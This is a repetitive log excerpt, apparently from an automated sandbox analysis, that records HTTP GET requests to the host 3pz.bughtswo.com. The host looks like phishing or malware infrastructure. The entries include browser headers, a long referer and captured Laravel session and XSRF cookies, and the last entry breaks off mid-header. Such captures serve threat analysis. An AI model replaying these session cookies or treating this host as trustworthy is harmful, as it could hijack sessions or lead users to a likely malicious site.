Source: global traffic	HTTP traffic detected: GET /ijoyUfMSqMcVe9WXGTZVlctVeCxOyPKKqrSkxb2xnBTPwVtirVuPyz230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjJJeKRwvQvI18yo62v8qr2JrPPmCQo5SPbYPPQ12130 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrRKnn6n9eUoC5I00CX7vJefVlhQdgy6RPYvoDRYN1q67140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /efBjX2yOm7GgfZp7ySyVTDijLhRc5kO0DER2eibNKXblerN790150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uheSegtXcJrGcg1LANWjxLwtiG1EYvEeZy6o1u9WZEqq1xsRwxhwODvkp HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klenjbRJbkmC9A5K6h8dlPsIojwX4ImnFqvwxZ7prt4wHIGzEyU78167 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klJEJj5AR8FEExIIOG1ZoX9K1rLijUqfl9xv18C2sUweSiWsxciyR4bNuR1awx216 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijoyUfMSqMcVe9WXGTZVlctVeCxOyPKKqrSkxb2xnBTPwVtirVuPyz230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxp9c6hIYkZlyZ86ciJJym3vOmghEsersSKv43s9kEMB4L7S90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjJJeKRwvQvI18yo62v8qr2JrPPmCQo5SPbYPPQ12130 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opCFdSgn1l9ejFMcZdMMdllPgt3wr0qvg5ghQ19r8NjVY4Vg9HKNBQfcd200 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrRKnn6n9eUoC5I00CX7vJefVlhQdgy6RPYvoDRYN1q67140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijjsoowXvipoSRdLsikOWGMMRfyP4mdeXkl14Vx3gpVt9nneix52sKmQK11HVfv3Pb12201 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opyYQhzf6pW8TXFXX4aHCJLltYOpZ9gZxhstvZonqoZbKeJY8p18pl4GSjlC7bkgJBIycd240 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 